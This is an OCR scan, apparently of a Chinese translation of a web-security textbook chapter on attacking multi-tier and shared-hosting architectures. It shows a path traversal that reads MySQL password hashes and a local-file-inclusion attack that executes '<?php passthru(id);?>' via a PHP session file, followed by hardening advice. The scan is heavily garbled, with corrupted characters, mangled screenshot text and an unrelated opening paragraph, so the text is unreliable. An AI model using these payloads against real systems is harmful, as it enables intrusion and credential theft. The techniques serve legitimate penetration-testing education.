big-endian 和 little-endian 是 用 来 表述 一 组 有 序 的 字数 存放 在 计算 机 
内 存 中 时 的 顺序 的 术语 。big-endian 是 将 高 位 字 节 (序列 中 最 重要 的 
E) 先 存放 在 高 地 址 处 的 顺序 ， 而 little-endian 是 将 低位 字 节 (序列 中 
最 不 重要 的 值 ) 先 存放 在 低地 址 处 的 顺序 。 ait 


当 评 估 某 个 应 用 程序 的 安全 状态 时 ，Web 应 用 程序 架构 经 常 被 名 
略 ， 但 实际 上 它 是 一 个 重要 的 安全 领域 。 在 常用 的 分 层 架 构 中 ， 如 果 
无 法 隔离 不 同 的 层次 ， 攻 击 者 就 可 以 利用 某 个 层次 中 的 一 个 漏洞 完全 
攻破 其 他 层次 ， 进 而 控制 整个 应 用 程序 。 

如 果 多 个 应 用 程序 在 相同 的 基础 架构 上 运行 ， 或 者 共享 一 个 用 途 
更 广泛 的 支配 型 应 用 程序 的 公共 组 件 ， 这 些 环境 也 会 造成 其 他 不 同类 
型 的 安全 威胁 。 在 这 些 情况 下 ， 攻 击 者 有 时 可 能 利用 应 用 程序 中 的 漏 
洞 或 恶意 代码 攻破 整个 环境 以 及 其 他 属于 不 同 客户 的 应 用 程序 。 最 近 
流行 的 < 云 计 算 * 增 加 了 许多 组 织 遭 受 此 类 攻击 的 可 能 性 。 

本 章 讨 论 一 系列 不 同类 型 的 架构 配置 ， 并 说 明 如 何 利用 应 用 程序 
架构 中 存在 的 缺陷 扩大 攻击 范围 。 


17.1 SÆI 


许多 Web 应 用 程序 使 用 多 层 架 构 ， 在 这 个 架构 中 ， 应 用 程序 用 户 
界面 、 业 务 逻 辑 与 数据 存储 分 别 位 于 不 同 的 层次 中 ， 这 些 层次 可 能 采 
用 各 种 技术 ， 并 在 不 同 的 计算 机 上 运行 。 一 个 常用 的 三 层 染 构 可 分 为 
以 下 层次 : 

口 展现 层 ， 执 行 应 用 程序 的 界面 ; 

a 应 用 程序 层 ， 执 行 核心 应 用 程序 逻辑 ; 

口 数 据 库 层 ， 存 储 并 处 理应 用 程序 数据 。 

实际 上 ， 许 多 复杂 的 企业 应 用 程序 对 不 同 层 次 进行 更 详细 的 划 
分 。 例 如 ， 一 个 基于 Java 的 应 用 程序 可 能 采用 以 下 层次 与 技术 : 
OMAR ARS ate (例如 Tomcat) ; 

口 展现 层 (例如 WebWork) ; 

口授 权 与 验证 层 (例如 JAAS 或 ACEGI) ; 

口 核 心 应 用 程序 框架 (例如 Struts 或 Spring) ; 

口 业务 逻辑 层 (例如 Enterprise Java Beans) ; 

口 数 据 库 对 象 关 系 映射 (例如 Hibernate) ; 

口 数据 库 JDBC 调 用 ; 

口 数 据 库 服务 器 。 

与 单 层 设计 相 比 ， 多 层 架 构 具 有 诸多 优点 。 与 大 多 数 软件 设计 方 
法 一 样 ， 将 高 度 复杂 的 处 理 任 务 分 解 成 商 单 、 模 块 化 的 功能 组 件 ， 能 
够 显著 改善 应 用 程序 开发 管理 并 降低 漏洞 的 发 生 率 。 拥 有 明确 定义 界 
面 的 独立 组 件 可 在 不 同 的 应 用 程序 内 及 应 用 程序 之 间 重 复 使 用 。 不 同 
的 开发 者 可 以 并 行 开 发 不 同 的 组 件 ， 而 不 必 深 入 了 解 其 他 组 件 的 执行 
细节 。 如 果 有 必要 替换 一 个 层次 使 用 的 技术 ， 替 换 过 程 也 不 会 给 其 他 
层次 造成 严重 影响 。 男 外 ， 如 有 果 运 用 合理 ， 多 层 染 构 可 显著 改善 整个 
应 用 程序 的 安全 状态 。 


17.1.1 ”攻击 分 层 架 构 
前 面 的 分 析 结 果 表 明 ， 如 果 一 个 多 层 架 构 的 执行 过 程 存在 缺陷 ， 


这 些 缺 陷 可 能 会 引入 安全 漏洞 。 了 解 多 层 模 型 可 帮助 渗透 测试 员 确定 
实施 各 种 安全 防御 (如 访问 控制 与 输入 确认 ) 的 位 置 ， 以 及 如 何 穿越 


层次 边界 来 破坏 这 些 防御 ， 从 而 对 Web 应 用 程序 实施 有 效 攻 击 。 设 计 
不 佳 的 分 层 架 构 可 能 受到 以 下 3 种 类 型 的 攻击 。 
可 E E E E 
| 男 一 个 层 。 
口 如 果 不 同 层 之 间 没 有 完全 隔离 ， 就 可 以 利用 某 一 层 存 在 的 缺陷 
直接 破坏 男 一 层 实施 的 安全 保护 。 
口 局 部 攻破 一 个 层 后 ， 就 可 以 直接 攻击 其 他 层 的 基础 架构 ， 从 而 
将 攻击 扩大 到 其 他 层 。 

下 面 逐 一 详细 介绍 这 些 攻击 。 
1. 利用 层 之 间 的 信任 关系 

应 用 程序 的 不 同 层 之 间 彼 此 信任 ， 并 以 特殊 的 方式 运转 。 如 果 应 
用 程序 运行 正常 ， 这 些 假设 就 有 效 。 然 而 ， 在 反常 情况 下 或 者 应 用 程 
序 正 受到 攻击 时 ， 上 壕 假设 束 会 被 打破 。 这 时 渗透 测试 员 就 可 以 利用 
I 
下 重 程度 。 

许多 企业 应 用 程序 中 存在 一 种 十 分 常见 的 信任 关系 ， 即 某 个 应 用 
程序 层 专门 负责 管理 用 户 访问 。 这 个 层 实施 验证 与 会 话 管理 ， 并 执行 
各 种 逻辑 ， 决 定 是 否 准予 某 个 特殊 的 请 求 。 如 果 该 应 用 程序 层 决定 准 
予 一 个 请 求 ， 它 就 癌 其 他 层 发 出 相关 命令 ， 以 执行 被 请 求 的 操作 。 其 
他 层 相 信 准 予 请 求 的 应 用 程序 层 ， 认 为 它 已 经 实施 了 严格 的 访问 控制 
检查 ， 因 而 执行 它们 从 该 应 用 程序 层 收 到 的 全 部 命令 。 

这 种 类 型 的 信任 关系 会 加 速 恶 化 我 们 在 前 面 章节 中 讨论 的 许多 常 
见 的 Web 漏洞。 如 果 应 用 程序 中 存在 SQL 注入 漏洞 ， 攻 击 者 就 可 以 利 
用 它 访问 应 用 程序 中 的 所 有 数据 。 即 使 应 用 程序 并 不 以 数据 库 管理 员 
的 身份 访问 数据 库 ， 它 通常 也 会 使 用 一 个 能 够 读 取 并 更 新 所 有 应 用 程 
序数 据 的 独立 帐户。 因此， 数据 库 层 完全 信任 对 它 的 数据 实施 访问 欣 
制 的 应 用 程序 层 。 

同样 ， 应 用 程序 组 件 通 常 使 用 较 高 权限 的 操作 系统 账户 运行 ， 这 
些 账 户 能 够 执行 敏感 操作 并 访问 关键 文件 。 在 这 种 配置 下 ， 操 作 系 统 
层 完全 信任 相关 应 用 程序 层 ， 认 为 它 不 会 执行 有 害 操作 。 如 果 攻 击 者 
发 现 一 个 命令 注入 漏洞 ， 在 利用 它 攻 破 应 用 程序 层 后 ， 他 们 还 可 以 进 
一 步 完 全 攻破 为 应 用 程序 层 提 供 文 持 的 基础 操作 系统 。 

层 之 间 的 信任 关系 还 可 能 导致 其 他 问题 。 如 果 一 个 应 用 程序 层 存 
在 编程 错误 ， 那 么 这 些 错误 可 能 会 导致 其 他 层 出 现 反常 行为 。 例 如 ， 
第 11 章 描述 的 竞 态 条 件 导 致 后 端 数据 库 提 供 属 于 错误 用 户 的 账户 信 
息 。 而 且 ， 如 果 管 理 员 正 在 调查 一 起 意外 事件 或 安全 违反 行为 ， 只 通 


过 查阅 信任 层 中 的 审计 日 志 通 党 并 不 足以 帮助 他 们 完全 了 解 事件 的 整 
个 发 生 过 程 ， 因 为 他 们 只 能 确定 可 信 层 是 引发 事件 的 媒介 。 例 如 ， 发 
Æ SQL 注入 攻击 后 ， 数 据 库 日 志 可 能 会 记 杂 攻击 者 注入 的 每 一 个 查 
询 ， 但 要 确定 哪 一 名 用 户 是 攻击 者 ， 还 必须 将 这 些 事件 与 应 用 程序 层 
中 的 日 志 记 如 进行 交 义 参考 ， 因 为 通过 日 志 记 录 无 法 确定 攻击 者 。 
2. 破坏 其 他 层 

如 有 果 应 用 程序 的 不 同 层 之 间 没 有 完全 隅 离 ， 那 么 攻破 一 个 层 的 攻 
击 者 束 可 以 直接 破坏 男 一 个 层 实施 的 安全 保护 ， 从 而 执行 这 个 层 人 负责 
挥 制 的 操作 或 访问 其 中 的 数据 。 

如 有 果 几 个 层 在 相同 的 计算 机 上 执行 ， 那 么 这 时 往往 会 出 现 漏 洞 。 
为 让 省 成 本 ， 许 多 应 用 程序 常常 采用 这 种 染 构 配置 。 

o 访问 解密 算法 

通 前 ， 为 满足 PCI 等 管理 或 法 规 要 求 ， 许 多 应 用 程序 都 会 对 敏感 
的 用 户 数据 进行 加 密 ， 以 最 大 限度 地 降低 应 用 程序 被 攻破 造成 的 影 
啊 。 虽 然 可 以 对 密码 进行 “加 salt 散 列 ? 处 理 ， 以 确保 即使 数据 存储 被 攻 
破 ， 攻 击 者 仍然 无 法 确定 密码 ， 但 对 于 应 用 程序 需要 将 其 恢复 为 明文 
值 的 数据 ， 则 需要 采用 不 同 的 处 理 方 法 。 关 于 这 类 数据 ， 最 彰 见 的 示 
例 包 括 用 户 的 安全 问题 (可 以 通过 与 服务 台 进 行 交 互 来 确认 ) 和 支付 
卡 信息 〈 在 付款 时 需要 这 些 信息 ) 。 为 此 ， 需 要 采用 某 种 双向 加 密 算 
法 。 使 用 加 密 时 出 现 的 典型 漏洞 是 ， 加 密 密 钥 与 加 密 数 据 之 间 未 进行 
逻辑 隔离 。 在 现 有 环境 中 使 用 加 密 时 ， 一 种 简单 但 存在 缺陷 的 隔离 方 
法 ， 是 将 算法 和 相关 密 钥 置 于 数据 层 ， 以 避免 影响 到 其 他 代码 。 但 
是 ， 如 果 数 据 层 也 被 攻破 〈 例 如 ， 通 过 SQL 注入 攻击 ) ， 攻 击 者 将 可 
以 轻松 确定 并 执行 解密 功能 。 


T 注解 无 论 以 何 种 方法 进行 加 密 ， 只 要 应 用 程序 能 够 解密 


言 息 ， 并 且 应 用 程序 被 完全 攻破 ， 攻 击 者 总 是 能 够 确定 解密 算法 的 
逻辑 路 径 。 


e 使 用 文件 读 取 访问 权限 提取 MySQL 数 据 

许多 小 型 应 用 程序 使 用 一 个 LAMP 服 务 器 (运行 Linux、Apache 、 
MySQL 和 PHP 等 开源 软件 的 独立 计算 机 ) 。 在 这 种 架构 中 ， 如 果 
Web 应 用 程序 层 中 的 一 个 文件 泄露 漏洞 ， 其 本 身 并 不 会 造成 严重 的 缺 
陷 ， 但 却 可 以 导致 攻击 者 无 限制 地 访问 应 用 程序 的 所 有 数据 ， 因 为 


MySQL 数 据 保存 在 可 读 的 文件 中 ， 且 Web 应 用 程序 进程 通常 有 权 读 取 
这 些 文件 。 即 使 数据 库 对 它 的 数据 实施 了 严格 的 访问 控制 ， 而 且 应 用 
程序 使 用 一 系列 低 权限 的 账户 连接 数据 库 ， 但 如 采 攻 击 者 能 够 直接 访 
问 保 存在 数据 库 层 中 的 数据 ， 他 仍然 可 以 完全 避 开 这 些 保护 。 

例如 ， 图 17-1 所 示 的 应 用 程序 允许 用 户 选 择 一 种 皮肤 ， 目 定义 他 
们 的 使 用 体验 。 这 要 求 用 户 选 择 一 个 层 车 样式 表 (Cascading Style 
Sheet, CSS) 文件 ， 并 且 应 用 程序 会 将 这 个 文件 呈现 给 用 户 审查 。 


© È ratpe//warh-live/ndsecportal/custornise?css=basx.cos y= 29X 


Site Skin Chooser 


Please review the following file for use in the current site skin: 


body {position relative; background white; margin: 0; padding: 0; left 0; } di+Enks (position: absolute; top: 150px; left 0; 
width: 166px; height 700px, font: 16px Verdana, sans-serif, z-index: 100;} divetinks a (display: block, text-align center; font: |e 
bold lem sums-sert, padding Spx 10px, margin U U Ipx; border-width 0, text-decoration none, color. FEC, background 
#444; border-right: Spx sod 2505050} diviinks ahover {color #411; background #AAA, border-right: Spx double 
white;} div¥inks a span {disphy- none;} dn tinks ahover span {display: block; position absolute; top: 60px; left 420; 
width: 300px, padding Spx: margin 10px: z-index: 100: color: #000066: background: white: font: 14px Verdana, sans-sent 
text-aligr center;} nbnks a amg {height 0; width 0; border-width 0;} divtilinks athover img {pesttion: absolute; top: 
180px, lcf 40px, height 100px, width 100px,} divécontent (position absolute, top: 150px. kft 180px, rgbt 25px, color 
#000066; background: white; at 12px Verdana, sans-senf, padding 10px; border: sobd Opx #444;} divécontent p 
{margin 0 lem lem;} divecoatent h3 (margin-botom: 0.25¢m;} hl (margin: -19px -Opx 0.5em; padding: 1 5px 0 Spx; text 
align: left; background: white; color: #667, letter-spacing: 0 Lem; font: boki 25px sans-serif, height: 28px; vertical-align 
middie; white-space: cowrap;} dt {font-weight bold} dd (margin-bottom: 0.66em;} code, pre (color: SEDC; font: 110% 
monospace; } divefooter [posiiomabsobute; bottom 0; color #BAA; font: 13px Verdana, sans-serf, padding: 10px; top:auto; 


图 17-1 一 个 包含 查看 选中 文件 功能 的 应 用 程序 


如 采 这 个 功能 包含 一 个 路 径 裔 历 漏 洞 (请 参阅 第 10 章 了 解 相 关内 
容 ) ， 那 么 攻击 者 就 可 以 利用 这 个 漏洞 直接 访问 保存 在 MySQL 数 据 库 
中 的 任意 数据 ， 从 而 破坏 在 数据 库 层 实施 的 访问 控制 。 图 17-2 显 示 了 
一 个 从 MySQL 用 户 表 中 成 功 获 取 用 户 名 和 密码 散 列 的 攻击 。 


ao 


Site Skin Chooser 


SS http://webb-live/mdsecportel/ customise? css d d dd dd wer! Tib/ mysql’ mysql uses. MYE A- BX| 


Please review the following file for use in the current site skin 


DLR 
ljocaihostroot*276FA27T7E4P276CDRC6AD6DFAPOFE31F9D127CFRR4ORimbunhroot"276EA27ESR276CDRC6A06DFA 
DOUa 127 .00 1lrootr276HA27ESB27T6CDBC6AU6DFABUE31F9D127CHE84W)9 localhost NUU pubu 0.0100 Nai 
localhostdebian-sys-maint* 7BIAS LEALD34SBE3FSES2FF SFD33DFF25CA0S56CF 09 192.168. 1 Lrooti 0 NOW 

192.168. 1 4root*276EA27ESB276CDBC6A 06DF ABOES 1F9D127CFES4.0\.0Mii% 

wahh* 7E64BES2C6SESMBOC43CSEDIDASI42325A9F S414, OU DF 1000000 

localhostwabh* TE64BE92C65ES4B0C \0243CSFD9D45342325A9F5414\0.0'0Y8 

192.168. 224 lroot*276EA27ESB276CDBC6A05DF ABOE3 1 F9D127CFES4\0P 0026 

labuser*A 7OEAD6DSBA6DC9CS | 23992FODB48DB 1 SCBICDIC OX Oa 

localhostlabuser* A70EAOSDEBAGDCO9C $ 123992 FODB48DB 13CB3CDIC 


图 17-2 ”一 个 破坏 数据 库 层 ， 获 取 任 意 数 据 的 攻击 


V 。” 提示 “如 果 攻 击 者 具有 文件 写 入 访问 权限 ， 就 可 以 党 试 对 


应 用 程序 的 配置 或 托管 的 虚拟 目录 执行 写 入 操作 ， 以 执行 相关 命 
令 。 请 参阅 第 10 章 的 nslookup 示 例 。 


@ 使 用 本 地 文件 包含 执行 命令 

许多 语言 都 包含 用 于 在 当前 脚本 中 包含 本 地 文件 的 画 数 。 如 果 攻 
击 者 能 够 指定 文件 系统 上 的 任何 文件 ， 这 无 疑 是 一 个 严重 的 问题 。 此 
类 文件 可 能 为 /etc/passwd 文 件 或 包含 密码 的 配置 文件 。 很 明显 ， 这 些 
情况 会 导致 信息 披露 ， 但 攻击 者 不 一 定 能 够 扩大 攻击 范围 ， 以 进一步 
攻破 整个 系统 (如 第 10 章 所 述 ， 通 过 远程 文件 包含 无 法 达到 这 一 目 
的 ) 。 不 过 ， 攻 击 者 仍然 可 以 利用 其 他 应 用 程序 或 平台 功能 ， 通 过 包 
含 一 个 内 容 部 分 受 其 控制 的 文件 来 执行 命令 。 

例如 ， 某 应 用 程序 在 以 下 URL 的 country 参 数 中 提交 用 户 输入 : 


http://eis/mdsecportal/prefs/preference_2?country=en-gb 


用 户 可 以 修改 country 参 数 来 包含 任意 文件 。 一 个 可 能 的 攻击 是 ， 请 求 
包含 脚本 命令 的 URL， 以 便 将 这 些 命令 写 入 Web 服 务 器 日 志文 件 ， 然 
后 使 用 本 地 文件 包含 行为 包含 这 个 日 志文 件 。 
一 种 利用 PHP 体 系 架构 怪 普 的 有 趣 方 法 ， 是 以 明文 形式 将 PHP 会 
话 变 量 写 入 使 用 会 话 令 牌 命名 的 文件 中 。 例 如 ， 以 下 文件 : 
/var/lib/php5/sess_9ceed0645151b31a494f4e52dabd0ed7 
可 能 包含 下 列 内 容 ， 其 中 包含 用 户 配置 的 昵称 : 


logged_in|i:1;id|s:2:"24" ;username|s:11: “manicsprout";nickname|s:22: 


"msp";privilege|s:1:"1"; 
攻击 者 可 以 对 这 种 行为 加 以 利用 。 首 先 ， 他 将 目 己 的 昵称 设置 为 
<?php passthru(id);?>， 如 图 17-3 所 示 。 然 后 ， 他 包含 会 话 文件 ， 使 用 
以 下 URL 执 行 id 命 令 ， 如 图 17-4 所 示 。 


tA 


© = http://wahh-live/auth/Profile 
— ae = 


username: morncsprout 


nickname: <?php passthrulid); ?> 
email: host@wahh-live com 
ext: x0001 

password: d4id8cd98/00b204e960 


Update 


图 17-3 ”配置 包含 服务 器 可 执行 的 脚本 代码 的 昵称 


Customazation Panel: select default country cose 

[E [a] 

preferences Bet 0i war/Eb1phpsyses5_9ceed0045151b3104943f4e52fabdoed7VO 

logged inii: Lidis:2:"24";urermame]s:I l: "manicsprout";ricknamea]s:22: was 33(wew-data) gid = 33{waw-data) grosxs=33(waw-data) "iprmaiegejs:1:°1"; 


图 17-4 通过 本 地 文件 包含 功能 执行 包含 恶意 昵称 的 会 话 文件 


http://eis/mdsecrortal/prefs/preference_2 .php?country=../../../../../../ 
../../var/lib/phyps/sess_9ceed0645151b31a194f4eS2dabd0ed7309 


渗透 测试 步骤 


(1) 对 于 在 应 用 程序 中 已 确定 的 任何 漏洞 ， 应 发 挥 想象 ， 考 
虚 如 何 利用 这 个 漏洞 实现 渗透 测试 目标 ， 这 古人 贯 容 全 书 的 主题 。 无 
数 针 对 Web 应 用 程序 实施 的 成 功 攻击 ， 最 初 都 是 从 利用 一 个 内 部 影 


响 有 限 的 漏洞 开始 的 。 通 过 利用 信任 关系 并 破坏 应 用 程序 其 他 地 方 
实施 的 控制 ， 渗 透 测 试 员 就 有 可 能 利用 一 个 看 似 细微 的 缺陷 ， 实 施 
严重 的 攻击 。 

(2) 如 果 能 在 任何 应 用 程序 组 件 上 执行 任意 命令 ， 并 能 够 与 
其 他 主机 建立 网 络 和 连接， 应 考虑 向 网 络 与 操作 系统 层面 中 的 应 用 程 
序 其 他 基础 架构 发 动 直接 攻击 ， 以 扩大 攻击 范围 。 


17.1.2 分 层 架 构 的 安全 
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序 的 安全 ， 因 为 它 能 够 将 一 次 成 功 攻击 的 影响 控制 在 局 部 。 在 前 面 摘 
述 的 基本 LAMP 配 置 中 ， 所 有 组 件 都 在 一 台 计 算 机 上 运行 ， 攻 破 其 中 
一 个 层 吕 ® 可 能 导致 整 个 应 用 程序 被 完全 攻破 。 在 更 安全 的 染 构 中 ， 攻 
击 者 攻破 一 个 层 ， 只 能 部 分 控制 应 用 程序 的 数据 与 处 理 操 作 ， 因 而 其 
造成 的 影响 有 限 ， 可 能 仅 局 限于 被 攻破 的 层 中 。 

1. 尽量 减少 信任 关系 

每 个 层 应 尽 可 能 实施 目 己 的 控制 ， 防 止 未 授权 操作 ， 并 不 得 信任 
其 他 应 用 程序 组 件 ， 以 阻止 该 层 可 能 有 助 于 防御 的 安全 违反 。 以 下 是 
将 这 个 原则 应 用 于 不 同 应 用 程序 层 的 一 些 实例 。 

口 应 用 程序 服务 器 层 应 对 特殊 的 资源 与 URL 路 径 实施 基于 角色 的 
访问 控制 。 例 如 ， 应 用 程序 服务 器 应 核实 所 有 访问 /admin 路 径 的 请 求 
均 由 管理 用 户 提出 ， 也 可 以 对 各 种 资源 (如 特殊 类 型 的 脚本 与 静态 资 
源 ) 实施 访问 控制 。 这 样 做 可 以 减轻 Web 应 用 程序 层 存 在 的 某 些 访问 
控制 缺陷 造成 的 影响， 因为 如 果 用 户 无 权 访 问 某 些 功能 ， 那 么 他 们 所 
出 的 请 求 在 到 达 这 个 层 之 前 就 已 经 税 阻 止 。 

口 数据 库 服务 器 层 可 以 为 应 用 程序 的 不 同 用 户 和 操作 提供 各 种 权 
限 的 账户 。 例 如 ， 可 以 给 未 通过 验证 的 用 户 分 配 一 个 只 读 访问 权限 的 


低 权 限 账户 ， 且 该 账户 只 能 访问 一 部 分 数据 。 至 于 已 通过 验证 的 不 同 
类 型 的 用 户 ， 可 以 向 他 们 分 配 各 种 数据 库 账 户 ， 并 根据 用 户 的 角色 ， 
允许 其 读 取 和 写 入 不 同 的 应 用 程序 数据 。 这 样 做 可 以 减轻 许多 SQL 注 
入 漏洞 造成 的 影响 ， 因 为 即使 攻击 取得 成 功 ， 攻 击 者 也 只 能 访问 用 户 
合法 使 用 应 用 程序 时 所 能 获得 的 数据 。 

口 所 有 应 用 程序 组 件 可 以 使 用 拥有 正常 操作 所 需 的 最 低 权 限 的 操 
作 系 统 账户 运行 。 这 样 做 可 以 减轻 这 些 组 件 中 存在 的 任何 命令 注入 或 
文件 访问 漏洞 造成 的 影响 。 在 设计 合理 并 得 到 充分 强化 的 架构 中 ， 攻 
击 者 就 无 法 利用 这 种 漏洞 访问 敏感 数据 或 执行 未 授权 操作 。 

2. 隔离 不 同 的 组 件 

应 尽 可 能 地 将 每 个 层 隔 离开 来 ， 避 免 它 们 在 无 意 间 彼 此 交互 。 为 
实现 这 个 目标 ， 有 些 时 候 可 能 需要 在 不 同 的 主机 上 运行 不 同 的 组 件 。 
以 下 是 应 用 这 个 原则 的 一 些 实例 。 

口 一 个 层 不 得 读 取 或 写 入 其 他 层 使 用 的 文件 。 例 如 ， 应 用 程序 层 
不 得 访问 任何 用 于 保存 数据 库 数据 的 物理 文件 ， 它 只 能 通过 一 个 适当 
权限 的 用 户 账户 ， 以 指定 的 方式 使 用 数据 库 查 询 访问 这 些 数据 。 

口 对 不 同 基础 架构 组 件 之 间 的 网 络 级 访问 进行 过 滤 ， 仅 允许 需要 
与 不 同 应 用 程序 层 彼 此 通信 的 服务 。 例 如 ， 执 行 应 用 程序 主要 逻辑 的 
服务 器 只 能 通过 用 于 进行 SQL 查询 的 端口 与 数据 库 服务 器 交互 。 这 种 
防范 并 不 能 阻止 利用 这 种 服务 针对 数据 库 层 的 攻击 ， 但 它 能 够 阻止 以 
数据 库 服 务 器 为 对 象 的 基础 架构 攻击 ， 并 且 能 够 防止 攻破 操作 系统 的 
攻击 者 到 达 组 织 的 内 部 网 络 。 

3. 应 用 深层 防御 

根据 架构 所 使 用 的 技术 ， 我 们 可 以 在 架构 的 不 同 组 件 内 实施 各 种 
保护 措施 ， 以 达到 将 某 个 成 功 攻 击 的 影响 限制 在 局 部 的 目的 。 以 下 是 
实施 这 些 控制 的 一 些 实例 。 

口 应 根据 配置 与 漏洞 补丁 ， 把 每 台 主 机 上 的 技术 栈 的 各 个 层面 进 
行 安全 强化 。 如 果 服 务 器 的 操作 系统 存在 缺陷 ， 那 么 拥有 低 权 限 账户 
的 攻击 者 就 可 以 利用 一 个 命令 注入 漏洞 提升 自己 的 权限 ， 从 而 完全 控 
制 整个 服务 器 。 如 果 其 他 主机 没有 得 到 强化 ， 这 种 攻击 就 可 能 会 在 整 
个 网 络 中 扩散 。 另 一 方面 ， 如 果 基 础 服务 器 安全 可 靠 ， 攻 击 造 成 的 影 
响 会 被 完全 局 限 在 一 个 或 几 个 应 用 程序 层 中 。 


口 应 对 保存 在 任何 应 用 程序 层 中 的 数据 进行 加 密 ， 以 防止 攻破 该 
层 的 攻击 者 轻松 获得 这 些 数 据 。 用 户 证 书 和 其 他 敏感 信息 〈 如 信用 卡 
号 ) ， 应 以 加 密 形 式 保存 在 数据 库 中 。 如 有 可 能 ， 应 使 用 内 置 保护 机 
制 保护 保存 在 Web 应 用 程序 层 中 的 数据 库 证 书 。 例 如 ， 在 ASPNET 2.0 
中 ， 加 密 的 数据 库 连 接 字 符 串 可 保存 在 web.config 文件 中 。 


17.2 主机 与 应 用 程 = 


许多 组 织 通过 外 部 提供 商 回 公众 提供 他 们 的 Web 应 用 程序 。 这 些 
服务 包括 组 织 通过 其 访问 Web 与 数据 库 服务 器 的 人 徐 单 主机 服务 ， 以 及 
代表 组 织 主动 维护 应 用 程序 的 成 熟 应 用 程序 服务 提供 商 (Application 
Service Provider, ASP) 。 和 缺乏 能 力 与 资源 部 署 目 己 的 应 用 程序 的 小 型 
企业 常常 采用 这 种 服务 ， 但 一 些 知 名 公司 有 时 也 使 用 这 些 服务 来 部 署 
特殊 的 应 用 程序 。 

大 多 数 Web 与 应 用 程序 主机 服务 提供 商 拥 有 众多 客户 ， 量 常常 使 
用 相同 的 基础 染 构 或 者 紧密 相连 的 基础 架构 支持 许多 客户 的 应 用 程 
序 。 因 此 ， 选 择 使 用 其 中 一 种 服务 的 组 织 必 须 考 虑 以 下 相关 威胁 。 
wee 服务 提供 商 的 一 名 恶意 客户 可 能 试图 破坏 该 组 织 的 应 用 程序 及 
其 数据 。 

口 一 名 不 知情 的 客户 可 能 部 署 一 个 易 受 攻击 的 应 用 程序 ， 使 得 恶 
ee 从 而 攻击 组 织 的 应 用 程序 及 其 数 
局 


在 共 至 系统 中 运行 的 Web 站 点 十 企 图 丑化 尽 可 能 多 的 Web 站 后 
的 “脚本 小 子 ” 的 主要 攻击 目标 ， 因 为 只 要 攻破 一 台 共 至 主机 ， 他 们 下 
能 在 短期 内 癌 数 百 台 明显 目 治 的 Web 站 点 实施 攻击 。 


17.2.1 虚拟 主机 


简单 的 共 圣 主机 配置 中 ， 一 台 Web 服 务 器 只 需要 支持 儿 个 域名 各 
不 相同 的 虚拟 Web 站 点 。 它 通过 Host 消 息 头 达到 这 个 目的 ， 在 HTTP 
1.1 中 ， 请 求 中 必须 包含 该 消息 头 。 当 浏览 峰 提 出 一 个 HTTP 请 求 时 ， 
请 求 中 即 包含 一 个 Host 消 息 头 ， 该 消息 头 中 舍 有 相关 UREL 中 的 域名 ; 
然后 ， 请 求 被 传送 到 与 域名 关联 的 IP 地 址 中 。 如 果 解 析 几 个 域名 得 到 
相同 的 IP 地 址 ， 在 这 个 地 址 上 的 服务 絮 仍 然 能 够 确定 请 求 希望 访问 哪 
一 个 Web 站 点 。 例 如， 可 以 配置 Apache 使 用 以 下 配置 支持 几 个 Web 站 
点 ， 这 个 配置 为 每 个 虚拟 主机 站 点 设 定 各 不 相同 的 Web 根 目录 。 


<VirtualHost *> 
ServerName wahh-appl.com 
DocumentRoot /www/appl 
</VirtualHost> 


<VirtualHost *> 
ServerName wahh-app2.com 
DocumentRoot /www/app2 
</VirtualHost> 


17.2.2 ”共享 的 应 用 程序 服务 


许多 ASP 提 供 现成 的 应 用 程序 ， 可 由 客户 修改 与 定制 后 使 用 。 对 
于 拥有 大 量 业 务 、 需 要 部 署 功能 强大 复杂 、 能 为 终端 用 户 提供 基本 相 
同 功能 的 应 用 程序 的 行业 ， 使 用 这 种 模型 可 以 节省 大 量 成 本 。 使 用 
ASP 提 供 的 这 种 服务 ， 商 家 可 迅速 获得 一 个 知名 品牌 的 应 用 程序 ， 而 
且 不 必 投 入 大 量 的 安装 与 维护 成 本 。 

在 金融 服务 行业 ，ASP 应 用 程序 市 场 特别 成 熟 。 举 例 来 说 ， 在 某 
个 国家 ， 可 能 有 数 千家 小 型 零售 商 希 望 向 顾客 提供 店内 支付 卡 与 信 食 
服务 。 这 些 零 售 商 将 这 项 服务 外 包 给 若干 不 同 的 信用 卡 提供 商 ， 其 中 
许多 提供 商 为 新 创办 的 企业 ， 而 非 历史 悠久 的 知名 银行 。 这 些 信用 卡 
提供 商 提供 一 种 商品 化 服务 ， 而 成 本 是 其 中 一 个 关键 的 竞争 因素 。 因 
此 ， 许 多 提供 商 使 用 一 家 ASP 为 终端 用 户 提供 Web 应 用 程序 。 因 此 ， 
ee 
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图 17-5 说 明了 这 种 服务 的 典型 组 织 结构 与 责任 划分 。 从 不 同 代理 
商 与 相关 任务 的 角度 看 ， 这 种 服务 存在 与 共享 主机 基本 模型 相同 的 安 
全 问题 ， 但 这 些 问题 可 能 更 复杂 。 而 且 ， 这 种 服务 还 存在 其 他 特殊 的 
问题 ， 如 17.2.3 节 所 述 。 


主机 和 维护 架构 ， 开 发 核心 
应 用 程序 ， 提 供 更 新 和 支持 


按照 商业 需求 
定制 核心 功能 


定制 外 层 应 用 程序 
和 非 功能 性 内 容 


使 用 应 用 程序 了 
解 状况 并 支付 


图 17-5 ”一 家 典型 应 用 程序 服务 提供 商 的 组 织 结构 


17.2.3 “攻击 共享 环境 


共享 主机 与 ASP 环 境 引 入 一 系列 新 的 潜在 漏洞 ， 攻 击 者 可 利用 它 
们 针对 共享 基础 架构 中 的 一 个 或 几 个 应 用 程序 进行 攻击 。 
1. 针对 访问 机 制 的 攻击 

因为 各 种 外 部 组 织 需要 更 新 与 定制 共享 环境 中 的 不 同 应 用 程序 ， 
提供 商 必须 执行 实现 这 种 远程 访问 的 机 制 。 在 最 简单 的 虚拟 主机 Web 
站 点 中 ，FTP 或 SCP 之 类 的 上 传 工 具 即 可 达到 这 种 目的 ， 客 户 通过 它们 
在 自己 的 Web 根 目录 中 写 入 文件 。 

如 果 主 机 服务 提供 一 个 数据 库 ， 客 户 可 能 需要 直接 访问 数据 库 ， 
以 配置 数据 库 设 置 ， 获 取 应 用 程序 保存 的 数据 。 这 时 ， 提 供 商 可 执行 
一 个 实现 某 些 数据 库 管理 功能 的 接口 ， 或 者 通过 因特网 提供 数据 库 服 
务 ， 人 允许 客户 直接 建立 连接 ， 并 使 用 他 们 上 自己 的 工具 。 

在 成 熟 的 ASP 环 境 中 ， 各 种 类 型 的 客户 需要 对 共 吾 应 用 程序 的 组 
件 进 行 不 同 程度 的 定制 ， 这 时 ， 提 供 商 通常 会 运行 功能 强大 的 应 用 程 
